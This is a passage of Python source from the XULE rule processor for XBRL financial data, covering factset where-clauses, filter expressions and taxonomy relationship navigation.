elif (model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'stringItemType') or
model_fact.concept.baseXbrliTypeQname == qname('http://www.xbrl.org/2003/instance',
'normalizedStringItemType')):
xule_type = 'string'
system_value = ''
else:
# There is no default value for the type of the fact
system_value = model_fact
xule_type = 'fact'
else:
system_value = model_fact
xule_type = 'fact'
fact_value = XuleValue(xule_context, system_value, xule_type,
alignment=None if alignment is None else frozenset(alignment.items()))
#if not current_no_alignment:
if alignment is not None:
fact_value.aligned_result_only = True
'''Where clause'''
if 'whereExpr' in factset:
# push the apsect variables
''' aspect_var_info is a tuple: 0 = aspect type, 1 = aspect name'''
# aspect_vars_flat = list(aspect_vars.items())
# for declaration_index, aspect_var_flat in enumerate(aspect_vars_flat, 1):
for var_name, aspect_var_tuple in aspect_vars.items():
aspect_type = aspect_var_tuple[0]
aspect_name = aspect_var_tuple[1]
# declaration_index = aspect_var_tuple[2]
# declaration_id = (factset['node_id'], declaration_index)
declaration_id = aspect_var_tuple[2]
if aspect_type == 'builtin':
if aspect_name == 'concept':
xule_context.add_arg(var_name,
declaration_id,
None,
XuleValue(xule_context, model_fact.concept, 'concept'),
'single')
elif aspect_name == 'period':
if model_fact.context.isStartEndPeriod:
xule_context.add_arg(var_name,
declaration_id,
None,
XuleValue(xule_context, (model_fact.context.startDatetime,
model_fact.context.endDatetime),
'duration', from_model=True),
'single')
elif model_fact.context.isInstantPeriod:
xule_context.add_arg(var_name,
declaration_id,
None,
XuleValue(xule_context, model_fact.context.instantDatetime,
'instant', from_model=True),
'single')
else:
xule_context.add_arg(var_name,
declaration_id,
None,
XuleValue(xule_context, (datetime.datetime.min, datetime.datetime.max),
'duration', from_model=True),
'single')
elif aspect_name == 'unit':
xule_context.add_arg(var_name,
declaration_id,
None,
XuleValue(xule_context, model_to_xule_unit(model_fact.unit, xule_context),
'unit'),
'single')
elif aspect_name == 'entity':
xule_context.add_arg(var_name,
declaration_id,
None,
XuleValue(xule_context, model_fact.context.entityIdentifier,
'entity'),
'single')
else:
raise XuleProcessingError(_("Unknown built in aspect '%s'" % aspect_name), xule_context)
elif aspect_type == 'explicit_dimension':
model_dimension = model_fact.context.qnameDims.get(aspect_name)
if model_dimension is None:
member = XuleValue(xule_context, None, 'qname')
else:
if model_dimension.isExplicit:
member = XuleValue(xule_context, model_dimension.memberQname, 'qname')
else:
# This is a typed dimension
member = XuleValue(xule_context, model_dimension.typedMember.xValue,
model_to_xule_type(xule_context, model_dimension.typedMember.xValue))
xule_context.add_arg(var_name,
declaration_id,
None, # tagged,
member,
'single')
# add the $item variable for the fact
xule_context.add_arg('fact',
# (factset['node_id'], 0),
factset['whereExpr']['node_id'],
None, # tagged
fact_value,
'single')
'''The where clause is evaluated in a sub table.'''
# switched_alignment = False
# if xule_context.dependent_alignment is None and alignment is not None:
# switched_alignment = True
# #xule_context.iteration_table.current_table.dependent_alignment = frozenset(alignment.items())
save_aligned_result_only = xule_context.aligned_result_only
# save_used_vars = xule_context.used_vars
save_used_expressions = xule_context.used_expressions
# pre_aggregation_table_list_size = len(xule_context.iteration_table)
where_table = xule_context.iteration_table.add_table(factset['whereExpr']['node_id'],
xule_context.get_processing_id(
factset['whereExpr']['node_id']),
is_aggregation=True)
# if switched_alignment:
# where_table.dependent_alignment = frozenset(alignment.items())
try:
while True:
xule_context.aligned_result_only = False
# xule_context.used_vars = []
xule_context.used_expressions = set()
where_matched = True
try:
where_value = evaluate(factset['whereExpr'], xule_context)
except XuleIterationStop as xis:
where_value = xis.stop_value # XuleValue(xule_context, None, 'unbound')
finally:
# if xule_context.iteration_table.current_table.current_alignment is None and xule_context.aligned_result_only:
# where_value = XuleValue(xule_context, None, 'unbound')
xule_context.aligned_result_only = save_aligned_result_only
if alignment is not None:
# if not current_no_alignment and xule_context.iteration_table.is_dependent:
# if not current_no_alignment and factset['is_dependent']:
if factset['is_dependent']:
if xule_context.dependent_alignment is not None:
if frozenset(alignment.items()) != xule_context.dependent_alignment:
# If this is in a 'with' clause, the first factset to be added to the with/agg table may be empty, The current alignment will be
# from a higher table which will not inlucde the with filter aspects.
if len(
nested_filters) > 0 and xule_context.iteration_table.current_table.current_alignment is None:
remove_aspects = [(nested_filter[0], nested_filter[1]) for nested_filter in
nested_filters]
adjusted_alignment = remove_from_alignment(frozenset(alignment.items()),
remove_aspects, xule_context)
if adjusted_alignment != xule_context.dependent_alignment:
where_matched = False
else:
where_matched = False
if where_matched:
default_used_expressions.update(set(xule_context.used_expressions))
if where_value.type in ('unbound', 'none'):
pass
elif where_value.type == 'bool':
if where_value.value:
new_fact_value = copy.copy(fact_value)
new_fact_value.facts = xule_context.iteration_table.facts.copy()
new_fact_value.tags = xule_context.iteration_table.tags.copy()
# new_fact_value.used_vars = get_used_vars(xule_context, pre_matched_used_var_ids + xule_context.used_vars)
new_fact_value.used_expressions = pre_matched_used_expressoins_ids | xule_context.used_expressions
results.append(new_fact_value)
'''It may be that the false value should also be included with an unbound value'''
else:
raise XuleProcessingError(_(
"Where clause in a factset did not evaluate to a boolean. Found '%s'." % where_value.type),
xule_context)
# xule_context.iteration_table.del_current()
# if len(xule_context.iteration_table) == pre_aggregation_table_list_size:
xule_context.iteration_table.next(where_table.table_id)
if where_table.is_empty:
break
finally:
# remove $item
xule_context.del_arg('fact', # (factset['node_id'], 0),
factset['whereExpr']['node_id'], )
# remove aspect variables
for var_name, aspect_var_tuple in aspect_vars.items():
declaration_id = aspect_var_tuple[2]
xule_context.del_arg(var_name, declaration_id)
# remove where table (if this is the result of an exception the where table may be left behind)
xule_context.iteration_table.del_table(where_table.table_id)
# restore aligned results, used_vars and used_expressoins
# xule_context.aligned_result_only = save_aligned_result_only
# xule_context.used_vars = save_used_vars
xule_context.used_expressions = save_used_expressions
else:
# fact_value.used_vars = get_used_vars(xule_context, pre_matched_used_var_ids)
fact_value.used_expressions = pre_matched_used_expressoins_ids
results.append(fact_value)
return results, default_used_expressions
# def evaluate_dict(dict_expr, xule_context):
# result_dict = dict()
# result_shadow = dict()
#
# for pair in dict_expr['items']:
# key = evaluate(pair['key'], xule_context)
# value = evaluate(pair['value'], xule_context)
#
# if key.type == 'dictionary':
# raise XuleProcessingError(_("Key to a dictionary cannot be a dictionary."), xule_context)
#
# if key.shadow_collection if key.type in ('set', 'list') else key.value not in result_shadow:
# result_dict[key] = value
# result_shadow[key.shadow_collection if key.type in (
# 'set', 'list') else key.value] = value.shadow_collection if value.type in (
# 'set', 'list', 'dictionary') else value.value
#
# return XuleValue(xule_context, frozenset(result_dict.items()), 'dictionary',
# shadow_collection=frozenset(result_shadow.items()))
#
#
# def evaluate_list(list_expr, xule_context):
# result = list()
# result_shadow = list()
# for item in list_expr['items']:
# item_value = evaluate(item, xule_context)
# result.append(item_value)
# result_shadow.append(item_value.value)
#
# return XuleValue(xule_context, tuple(result), 'list', shadow_collection=tuple(result_shadow))
#
#
# def evaluate_set(set_expr, xule_context):
# result = list()
# result_shadow = list()
# for item in set_expr['items']:
# item_value = evaluate(item, xule_context)
# if item_value.shadow_collection if item_value.type in (
# 'set', 'list', 'dictionary') else item_value.value not in result_shadow:
# result.append(item_value)
# result_shadow.append(item_value.value)
#
# return XuleValue(xule_context, frozenset(result), 'set', shadow_collection=frozenset(result_shadow))
def evaluate_filter(filter_expr, xule_context):
collection_value = evaluate(filter_expr['expr'], xule_context)
if collection_value.type not in ('set', 'list'):
raise XuleProcessingError(
_("Filter expresssion can only be used on a 'set' or 'list', found '{}'.".format(collection_value.type)),
xule_context)
# do nothing if there is no filtering
if 'whereExpr' not in filter_expr and 'returnsExpr' not in filter_expr:
return collection_value
if collection_value.type == 'set':
results = set()
results_shadow = set()
else: # list
results = list()
results_shadow = list()
for item_number, item_value in enumerate(collection_value.value):
xule_context.add_arg('item',
filter_expr['expr']['node_id'],
None,
item_value,
'single')
try:
xule_context.column_prefix.append("{}-{}".format(filter_expr['node_id'], item_number))
try:
keep = True
if 'whereExpr' in filter_expr:
keep = False
filter_where_result = evaluate(filter_expr['whereExpr'], xule_context)
if filter_where_result.type == 'bool':
keep = filter_where_result.value
elif filter_where_result.type not in ('unbound', 'none'):
raise XuleProcessingError(_(
"The where clause on a filter expression must evaluate to a boolean, found '{}'.".format(
filter_where_result.type)), xule_context)
if keep:
if 'returnsExpr' in filter_expr:
keep_item = evaluate(filter_expr['returnsExpr'], xule_context)
else:
keep_item = item_value
if collection_value.type == 'set':
if (keep_item.shadow_collection if keep_item.type in (
'list', 'set', 'dictionary') else keep_item.value) not in results_shadow:
results.add(keep_item)
results_shadow.add(keep_item.shadow_collection if keep_item.type in (
'list', 'set', 'dictionary') else keep_item.value)
# otherwise, this a duplicate
else: # list
results.append(keep_item)
results_shadow.append(keep_item.shadow_collection if keep_item.type in (
'list', 'set', 'dictionary') else keep_item.value)
finally:
# remove the args
xule_context.del_arg('item',
filter_expr['expr']['node_id'])
finally:
xule_context.column_prefix.pop()
if collection_value.type == 'set':
return XuleValue(xule_context, frozenset(results), 'set', shadow_collection=frozenset(results_shadow))
else: # list
return XuleValue(xule_context, tuple(results), 'list', shadow_collection=tuple(results_shadow))
def evaluate_navigate(nav_expr, xule_context):
# Get the taxonomy
if 'taxonomy' in nav_expr:
dts_value = evaluate(nav_expr['taxonomy'], xule_context)
if dts_value.type != 'taxonomy':
raise XuleProcessingError(
_("Expecting a taxonomy for the 'taxonomy' clause of navigate. Found {}.".format(dts_value.type)),
xule_context)
dts = dts_value.value
else:
# Default to the taxonomy of the instance
dts = xule_context.model
# Set up the variables for the results of the traversal
return_by_networks = nav_expr.get('return', dict()).get('byNetwork', False)
if return_by_networks:
results_by_networks = dict()
result_items = list()
# Determine if we are returning paths.
paths = nav_expr.get('return', dict()).get('paths', False)
return_names = get_return_component_names(nav_expr, xule_context)
# Get the from and to concepts if they are supplied in the expression
nav_from_concepts = nav_get_element(nav_expr, 'from', dts, xule_context)
nav_to_concepts = nav_get_element(nav_expr, 'to', dts, xule_context)
# This checks if there was 'from' concept in the expression, but no concepts were return. Same for the 'to' concept in the expression. Then there is not navigation to do
if (nav_from_concepts is None or len(nav_from_concepts) > 0) and (
nav_to_concepts is None or len(nav_to_concepts) > 0):
arcrole = nav_get_role(nav_expr, 'arcrole', dts, xule_context)
role = nav_get_role(nav_expr, 'role', dts, xule_context)
link_qname = evaluate(nav_expr['linkbase'], xule_context).value if 'linkbase' in nav_expr else None
arc_qname = None # This is always none.
dimension_arcroles = None
# Find the relationships
if (('arcrole' in nav_expr and arcrole is None) or
('role' in nav_expr and role is None) or
('linkbase' in nav_expr and link_qname is None)):
# There are no networks to navigate
relationship_sets = list()
else:
# get the relationships
if nav_expr.get('dimensional'):
drs_role = nav_get_role(nav_expr, 'drsRole', dts, xule_context)
table_concepts = nav_get_element(nav_expr, 'cube', dts, xule_context)
if arcrole is not None:
dimension_arcroles = xc.DIMENSION_PSEDDO_ARCROLES.get(arcrole, ('all', {arcrole, }))
# relationship_sets = [XuleUtility.dimension_set(dts, x) for x in XuleUtility.base_dimension_sets(dts) if ((drs_role is None or x[XuleUtility.DIMENSION_SET_ROLE] == drs_role) and
# (table_concepts is None or x[XuleUtility.DIMENSION_SET_HYPERCUBE] in table_concepts))]
relationship_sets = [XuleDimensionCube(dts, *x) for x in XuleDimensionCube.base_dimension_sets(dts) if
((drs_role is None or x[XuleDimensionCube.DIMENSION_SET_ROLE] == drs_role) and
(table_concepts is None or x[
XuleDimensionCube.DIMENSION_SET_HYPERCUBE] in table_concepts))]
else:
relationship_set_infos = XuleProperties.get_base_set_info(dts, arcrole, role, link_qname, arc_qname)
relationship_sets = [XuleUtility.relationship_set(dts, x) for x in relationship_set_infos]
direction = nav_expr['direction']
include_start = nav_expr.get('includeStart', False)
for relationship_set in relationship_sets:
if nav_from_concepts is None:
# The from was not in tne navigate expression. Use the roots
from_concepts = relationship_set.rootConcepts
else:
from_concepts = nav_from_concepts
for from_concept in from_concepts:
# if direction == 'self':
# # include_start is always False for the self direction since the self concept is always included.
# for rel in relationship_set.fromModelObject(from_concept):
# result_items += nav_decorate({'relationship': rel, 'network': get_network_info(relationship_set, xule_context)}, 'from', return_names, False, xule_context)
# for rel in relationship_set.toModelObject(from_concept):
# result_items += nav_decorate({'relationship':rel, 'network': get_network_info(relationship_set, xule_context)}, 'to', return_names, False, xule_context)
# #result_items += list(y for y in (nav_decorate(rel, 'from', nav_expr, False, xule_context) for rel in relationship_set.fromModelObject(from_concept))) + list(y for y in (nav_decorate(rel, 'to', nav_expr, xule_context) for rel in relationship_set.toModelObject(from_concept))) # This will be a list
if direction == 'descendants':
for rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set, from_concept,
nav_to_concepts, int(nav_expr['depth']), return_names, dimension_arcroles):
result_items += nav_decorate(rel, 'down', return_names, include_start, paths, xule_context)
if direction == 'children':
for rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set, from_concept,
nav_to_concepts, 1, return_names, dimension_arcroles):
result_items += nav_decorate(rel, 'down', return_names, include_start, paths, xule_context)
if direction == 'ancestors':
for rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept,
nav_to_concepts, int(nav_expr['depth']), return_names, dimension_arcroles):
result_items += nav_decorate(rel, 'up', return_names, include_start, paths, xule_context)
if direction == 'parents':
for rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept,
nav_to_concepts, 1, return_names, dimension_arcroles):
result_items += nav_decorate(rel, 'up', return_names, include_start, paths, xule_context)
if direction == 'siblings':
for parent_rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept, None,
1, list(), dimension_arcroles):
for sibling_rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set,
parent_rel['relationship'].fromModelObject, nav_to_concepts, 1,
return_names, dimension_arcroles):
if include_start or sibling_rel['relationship'] is not parent_rel['relationship']:
result_items += nav_decorate(sibling_rel, 'down', return_names, False, paths,
xule_context)
if direction == 'previous-siblings':
for parent_rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept, None,
1, list(), dimension_arcroles):
for sibling_rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set,
parent_rel['relationship'].fromModelObject, nav_to_concepts, 1,
return_names, dimension_arcroles):
if include_start or sibling_rel['relationship'] is not parent_rel['relationship']:
result_items += nav_decorate(sibling_rel, 'down', return_names, False, paths,
xule_context)
if sibling_rel['relationship'] is parent_rel['relationship']:
break # We are done.
if direction == 'following-siblings':
for parent_rel in nav_traverse(nav_expr, xule_context, 'up', relationship_set, from_concept, None,
1, list(), dimension_arcroles):
start_rel_found = False
for sibling_rel in nav_traverse(nav_expr, xule_context, 'down', relationship_set,
parent_rel['relationship'].fromModelObject, nav_to_concepts, 1,
return_names, dimension_arcroles):
if sibling_rel['relationship'] is parent_rel['relationship']:
start_rel_found = True
if start_rel_found:
if include_start or sibling_rel['relationship'] is not parent_rel['relationship']:
result_items += nav_decorate(sibling_rel, 'down', return_names, False, paths,
xule_context)
if return_by_networks:
if len(result_items) > 0:
results_by_networks[get_network_info(relationship_set, xule_context)] = result_items
result_items = list()
if return_by_networks:
return nav_finish_results(nav_expr, results_by_networks, 'result-order' in return_names, xule_context)
else:
return nav_finish_results(nav_expr, result_items, 'result-order' in return_names, xule_context)
def nav_traverse(nav_expr, xule_context, direction, network, parent, end_concepts, remaining_depth, return_names,
dimension_arcroles=None, previous_concepts=None, nav_depth=1, result_order=0,
arc_attribute_names=None):
"""Traverse a network
Arguments:
direction (string): Either 'down' or 'up'
network (ModelRelationshipSet): The network of relationships.
parent (ModelConcept): The parent concept
end_concepts (set of ModelConcepts): A set of concepts if encountered the traversal should stop
depth (int): How many levels to traverse. -1 is infinite depth.
previous_concepts (set of ModelConcepts): List concepts already traversed. Used to prevent loops in the traversal
include_start (boolean): Indicates that the starting concept should be included in the results
Return:
list of tuples of (ModelRelationship, top)
"""
# Initialize previous_concepts
if previous_concepts is None: # this only happens on the intial call.
previous_concepts = {parent, }
arc_attribute_names = {x for x in return_names if isinstance(x, QName)}
first_time = True
else:
first_time = False
if end_concepts is None:
end_concepts = set()
# initialize depth
if remaining_depth == -1:
depth = float('inf')
if remaining_depth == 0:
return list()
paths = nav_expr.get('return', dict()).get('paths', False)
# 'children' are parents if the direction is up.
children = list()
if parent in end_concepts:
# This should only happen if in the inital call to nav_traverse the parent is in the list of
# end concepts. In this case there is no navigation.
return children
children_method = network.fromModelObject if direction == 'down' else network.toModelObject
for rel_number, rel in enumerate(sorted(children_method(parent), key=lambda x: x.order or 1), 1):
inner_children = list()
child = rel.toModelObject if direction == 'down' else rel.fromModelObject
rel_info = {'relationship': rel}
if first_time:
rel_info['first'] = True
if 'network' in return_names:
rel_info['network'] = get_network_info(network, xule_context)
if 'navigation-order' in return_names:
rel_info['navigation-order'] = rel_number
if 'navigation-depth' in return_names:
rel_info['navigation-depth'] = nav_depth
# if 'result-order' in return_names:
# rel_info['result-order'] = result_order
for arc_attribute_name in arc_attribute_names:
rel_info[arc_attribute_name] = rel.arcElement.get(arc_attribute_name.clarkNotation)
# Decide if the child will be in the results. If the child is not in the results, the navigation does not stop.
if not (
nav_traverse_where(nav_expr, 'whereExpr', rel, xule_context) and
(
dimension_arcroles is None or
'dimensional' not in nav_expr or
('dimensional' in nav_expr and rel.arcrole in dimension_arcroles[
xc.DIMENSION_PSEUD0_ARCROLE_PART] and
(
dimension_arcroles[xc.DIMENSION_PSEUD0_SIDE] == 'all' or
rel.side == dimension_arcroles[xc.DIMENSION_PSEUD0_SIDE]
)
)
)
):
rel_info['relationship'] = None
keep_rel = rel_info
if child not in previous_concepts:
if child in end_concepts:
# This is the end of the traversal because the child is a 'to' concept.
if paths:
inner_children.append([keep_rel, ])
else:
inner_children += [keep_rel, ]
else:
if nav_traverse_where(nav_expr, 'stopExpr', rel, xule_context):
next_children = list()
else:
next_children = nav_traverse(nav_expr,
xule_context,
direction,
network,
child,
end_concepts,
remaining_depth - 1,
return_names,
dimension_arcroles,
previous_concepts | {child, },
nav_depth + 1,
result_order,
arc_attribute_names)
if len(next_children) == 0 and len(end_concepts) > 0: # The to concept was never found
# Reset the inner_child list. This will throw away all reseults that lead to this moment.
inner_children = list()
else:
if paths:
if len(next_children) == 0:
# On a leaf. This is where a path is initially created.
inner_children.append([keep_rel, ])
else:
# There are children of the current child (keep_rel), add the current child to each of the paths from the current childs children
for i in next_children:
inner_children.append([keep_rel, ] + i)
else:
inner_children += [keep_rel, ] + next_children
else:
if keep_rel['relationship'] is not None:
# indicates a cycle
keep_rel['cycle'] = True
if paths:
inner_children.append([keep_rel, ])
else:
inner_children.append(keep_rel)
children += inner_children
# This only allows the first child of the initial call to nav_traverse to be marked as first.The first is used to indicate when to use
# the from side of the relationship for 'ionclude start'.
if not paths:
first_time = False
return children
def nav_traverse_where(nav_expr, clause_name, relationship, xule_context):
if clause_name not in nav_expr:
if clause_name == 'whereExpr':
return True
else: # 'stopExpr'
return False
else:
xule_context.add_arg('relationship',
nav_expr[clause_name]['node_id'],
None,
XuleValue(xule_context, relationship, 'relationship'),
'single')
try:
nav_where_results = evaluate(nav_expr[clause_name], xule_context)
finally:
# remove the args
xule_context.del_arg('relationship',
nav_expr[clause_name]['node_id'])
if nav_where_results.type == 'bool':
return nav_where_results.value
elif nav_where_results.type in ('unbound', 'none'):
return False
elif filter_where_result.type not in ('unbound', 'none'):
raise XuleProcessingError(_(
"The {} clause on a navigation expression must evaluate to a boolean, found '{}'.".format(
clause_name[:clause_name.find('Expr')], nav_where_results.type)), xule_context)
def nav_get_role(nav_expr, role_type, dts, xule_context):
"""Get the full role from the navigation expression.
A role in the navigation expressions is either a string, uri or a non prefixed qname. If it is a string or uri, it is a full arcrole. If it is
a non prefixed qname, than the local name of the qname is used to match an arcrole that ends in 'localName'. If more than one arcrole is found then
and error is raise. This allows short form of an arcrole i.e parent-child.
"""
if role_type in nav_expr:
role_value = evaluate(nav_expr[role_type], xule_context)
if role_value.type in ('string', 'uri'):
return role_value.value
elif role_value.type == 'qname':
return XuleUtility.resolve_role(role_value, role_type, dts, xule_context)
elif role_value.type == 'role':
return role_value.value.roleURI
else:
raise XuleProcessingError(_("Navigation is expecting a role (role, string, uri, or short role name), found '{}'.".format(role_value.type)), xule_context)
else:
return None # There is no arcrole on the navigation expression
def nav_get_element(nav_expr, side, dts, xule_context):
"""Get the element or set of elements on the from or to side of a navigation expression'
This determines the from/to elements of a navigation expression. If the navigation expression includes the from/to component, this will be evaluated.
The result can be a qname, concept or a set/list of qname or concepts.
Arguments:
nav_expr (dictionary): The navigation expression AST node
side (string): Either 'from' or 'to'.
xule_context (XuleRuleContext): The processing context
Returns:
None - indicates that the side is not in the navigation expression
set of concepts - the set of the concepts if the side evaluates to a set or list of concept/concepts
"""
if side in nav_expr:
side_value = evaluate(nav_expr[side], xule_context)
if side_value.type == 'qname':
concept = XuleProperties.get_concept(dts, side_value.value)
if concept is None:
return set()
else:
return {concept, }
elif side_value.type == 'concept':
return {side_value.value, }
elif side_value.type in ('set', 'list'):
concepts = set()
for item in side_value.value:
if item.type == 'qname':
concept = XuleProperties.get_concept(dts, item.value)
if concept is not None:
concepts.add(concept)
elif item.type == 'concept':
concepts.add(item.value)
else:
raise XuleProcessingError(_(
"In navigation, expecting a collection of concepts or concepts, but found {}.".format(
item.type)))
return concepts
else:
raise XuleProcessingError(
_("In navigation, expecting a concept or qname, but found {}.".format(side_value.type)))
else:
return None # The side is not in the navigation expression
def nav_decorate(rel, direction, return_names, include_start, paths, xule_context):
"""Determine what will be outputted for a single navigation item.
Arguments:
rel (dict): A dition of the relationship and additional information from the traversal
direction (string): 'up' or 'down'. Direction of the traversal
return_names (list of strings): List of the return components to decoreate the relationship.
include_start (boolean or 'start_only'): Indicates if the start concept should be returned.
xule_context (XuleRuleContext): Processing context
Returns:
A tuple of tuples of the return components for the relationship. The tuple is composed of:
0. value
1. xule type
2. return component name
"""
result = list()
if paths:
# In this case, rel is a list of relatioships in the path.
path = list()
for i in rel:
if include_start and i.get('first', False):
path.append(nav_decorate_gather_components(i, direction, return_names, True, xule_context))
path.append(nav_decorate_gather_components(i, direction, return_names, False, xule_context))
result.append(path)
else:
if rel['relationship'] is not None:
if include_start and rel.get('first', False):
result.append(nav_decorate_gather_components(rel, direction, return_names, True, xule_context))
result.append(nav_decorate_gather_components(rel, direction, return_names, False, xule_context))
return result
def get_return_component_names(nav_expr, xule_context):
component_names = list()
if 'return' in nav_expr:
if 'returnComponents' in nav_expr['return']:
for component in nav_expr['return']['returnComponents']:
if isinstance(component, dict):
# This is an expression which should evluate to a qname. This is an arc attribute name.
component_name_value = evaluate(component, xule_context)
if component_name_value.type != 'qname':
raise XuleProcessingError(_(
"Expression in return components of a navigate expression did not evaluate to a qname. Expecting a qname for the name of a arc attribute. Found {}").format(
component_name_value.type), xule_context)
component_names.append(component_name_value.value)
else:
component_names.append(component)
else:
component_names.append('target')
else:
component_names.append('target')
return component_names
# nav_expr.get('return', {'returnComponents': ('target',)}).get('returnComponents', ('target',))
def nav_decorate_gather_components(rel, direction, component_names, is_start, xule_context):
"""Get the values for all the return components for a relationship.
Arguments:
rel (dict): A dition of the relationship and additional information from the traversal
direction (string): 'up' or 'down'. Direction of the traversal
component_names (list of strings): The list of return components to get for the relationship.
is_start (boolean): Indicates if the relationship should be treated as a starting relationship. This is used if the 'include start' keyword is
is included in the navigation expression and the relationship is from the start of the navigation. In this case there is
an extra result for the relationships for the starting concept.
xule_context (XuleRuleContext): The processing context.
Returns:
A tupple of return component values. Each value is a tuple of:
1. component value
2. xule type for the value
3. component name (used for ease of debugging)
"""
result = list()
for component_name in component_names:
if component_name == 'result-order':
result.append('result-order') # This will be handled in the finishing step
else:
result.append(nav_decorate_component_value(rel, direction, component_name, is_start, xule_context))
return result
def nav_decorate_component_value(rel, direction, component_name, is_start, xule_context):
"""Get the return component value for a relationship and a single return component.
Arguments:
rel (dict): A dition of the relationship and additional information from the traversal
direction (string): 'up' or 'down'. Direction of the traversal
component_name (string): Component name
is_start (boolean): Indicates if the relationship should be treated as a starting relationship. This is used if the 'include start' keyword is
is included in the navigation expression and the relationship is from the start of the navigation. In this case there is
an extra result for the relationships for the starting concept.
xule_context (XuleRuleContext): The processing context.
Returns:
A tuple of:
1. component value
2. xule type for the value
3. component name (used for ease of debugging)
"""
if component_name in NAVIGATE_RETURN_COMPONENTS:
if rel['relationship'] is None:
return (None, 'none', component_name)
if NAVIGATE_RETURN_COMPONENTS[component_name][NAVIGATE_ALLOWED_ON_START]:
if rel['relationship'] is None:
return (None, 'none', component_name)
else:
return NAVIGATE_RETURN_COMPONENTS[component_name][NAVIGATE_RETURN_FUCTION](rel, direction,
component_name, is_start,
xule_context)
else:
if is_start:
return (None, 'none', component_name)
else:
if rel['relationship'] is None:
return (None, 'none', component_name)
else:
return NAVIGATE_RETURN_COMPONENTS[component_name][NAVIGATE_RETURN_FUCTION](rel, direction,
component_name,
xule_context)
else:
# Could be an arc attribute name (qname)
if isinstance(component_name, QName):
if rel['relationship'] is None:
return (None, 'none', component_name)
else:
attribute_value = rel[component_name]
if attribute_value is None:
return (None, 'none', component_name)
else:
return (attribute_value, 'string', component_name)
else:
raise XuleProcessingError(_("Component {} is not currently supported.".format(component_name)),
xule_context)
def nav_decorate_component_target(rel, direction, component_name, is_start, xule_context):
if is_start:
# If it is the start concept, then get the opposide side of the relationship.
if component_name == 'target':
if direction == 'up':
return (rel['relationship'].toModelObject, 'concept', component_name)
else:
return (rel['relationship'].fromModelObject, 'concept', component_name)
elif component_name == 'target-name':
if direction == 'up':
return (rel['relationship'].toModelObject.qname, 'qname', component_name)
else:
return (rel['relationship'].fromModelObject.qname, 'qname', component_name)
else:
if component_name == 'target':
if direction == 'up':
return (rel['relationship'].fromModelObject, 'concept', component_name)
else:
return (rel['relationship'].toModelObject, 'concept', component_name)
if component_name == 'target-name':
if direction == 'up':
return (rel['relationship'].fromModelObject.qname, 'qname', component_name)
else:
return (rel['relationship'].toModelObject.qname, 'qname', component_name)
def nav_decorate_component_source(rel, direction, component_name, xule_context):
if component_name == 'source':
if direction == 'up':
return (rel['relationship'].toModelObject, 'concept', component_name)
else:
return (rel['relationship'].fromModelObject, 'concept', component_name)
elif component_name == 'source-name':
if direction == 'up':
return (rel['relationship'].toModelObject.qname, 'qname', component_name)
else:
return (rel['relationship'].fromModelObject.qname, 'qname', component_name)
def nav_decorate_component_order(rel, direction, component_name, xule_context):
return (rel['relationship'].orderDecimal, 'decimal', component_name)
def nav_decorate_component_weight(rel, direction, component_name, xule_context):
if rel['relationship'].weightDecimal is None:
return (None, 'none', component_name)
else:
return (rel['relationship'].weightDecimal, 'decimal', component_name)
def nav_decorate_component_preferred_label_role(rel, direction, component_name, xule_context):
if rel['relationship'].preferredLabel is not None:
#return (rel['relationship'].preferredLabel, 'uri', component_name)
return (XuleUtility.role_uri_to_model_role(rel['relationship'].modelXbrl, rel['relationship'].preferredLabel), 'role', component_name)
else:
return (None, 'none', component_name)
def nav_decorate_component_preferred_label(rel, direction, component_name, xule_context):
if rel['relationship'].preferredLabel is not None:
label = XuleProperties.get_label(xule_context, rel['relationship'].toModelObject, rel['relationship'].preferredLabel, None)
if label is None:
return (None, 'none', component_name)
else:
return (label, 'label', component_name)
else:
return (None, 'none', component_name)
def nav_decorate_component_relationship(rel, direction, component_name, xule_context):
return (rel['relationship'], 'relationship', component_name)
def nav_decorate_component_role(rel, direction, component_name, xule_context):
role = get_role(rel['relationship'], xule_context)
return (role, 'role', component_name)
def get_role(relationship, xule_context):
role_uri = relationship.linkrole
if role_uri in xule_context.model.roleTypes:
return xule_context.model.roleTypes[role_uri][0]
else:
return XuleRole(role_uri)
def nav_decorate_component_role_uri(rel, direction, component_name, xule_context):
role_uri = rel['relationship'].linkrole
return (role_uri, 'uri', component_name)
def nav_decorate_component_role_description(rel, direction, component_name, xule_context):
role = get_role(rel['relationship'], xule_context)
return (role.definition, 'string', component_name)
def nav_decorate_component_arcrole(rel, direction, component_name, xule_context):
arcrole = get_arcrole(rel['relationship'], xule_context)
return (arcrole, 'role', component_name)
def get_arcrole(relationship, xule_context):
arcrole_uri = relationship.arcrole
if arcrole_uri in xule_context.model.arcroleTypes:
return xule_context.model.arcroleTypes[arcrole_uri][0]
else:
return XuleArcrole(arcrole_uri)
def nav_decorate_component_arcrole_uri(rel, direction, component_name, xule_context):
return (rel['relationship'].arcrole, 'uri', component_name)
def nav_decorate_component_arcrole_description(rel, direction, component_name, xule_context):
arcrole = get_arcrole(rel['relationship'], xule_context)
return (arcrole.definition, 'string', component_name)
def nav_decorate_component_cycles_allowed(rel, direction, component_name, xule_context):
arcrole = get_arcrole(rel['relationship'], xule_context)
return (arcrole.cyclesAllowed, 'string', component_name)
def nav_decorate_component_link_name(rel, direction, component_name, xule_context):
return (rel['relationship'].linkQname, 'qname', component_name)
def nav_decorate_component_arc_name(rel, direction, component_name, xule_context):
return (rel['relationship'].qname, 'qname', component_name)
def nav_decorate_component_network(rel, direction, component_name, xule_context):
return (rel['network'], 'network', component_name)
def get_network_info(network, xule_context):
network_info = (network.arcrole, network.linkrole, network.arcqname, network.linkqname, False)
return (network_info, network)
def nav_decorate_component_cycle(rel, direction, component_name, is_start, xule_context):
return (False if is_start else rel.get('cycle', False), 'bool', component_name)
def nav_decorate_component_navigation_order(rel, direction, component_name, is_start, xule_context):
if is_start:
return (0, 'int', component_name)
else:
return (rel['navigation-order'], 'int', component_name)
def nav_decorate_component_navigation_depth(rel, direction, component_name, is_start, xule_context):
if is_start:
return (0, 'int', component_name)
else:
return (rel['navigation-depth'], 'int', component_name)
def nav_decorate_component_result_order(rel, direction, component_name, is_start, xule_context):
if is_start:
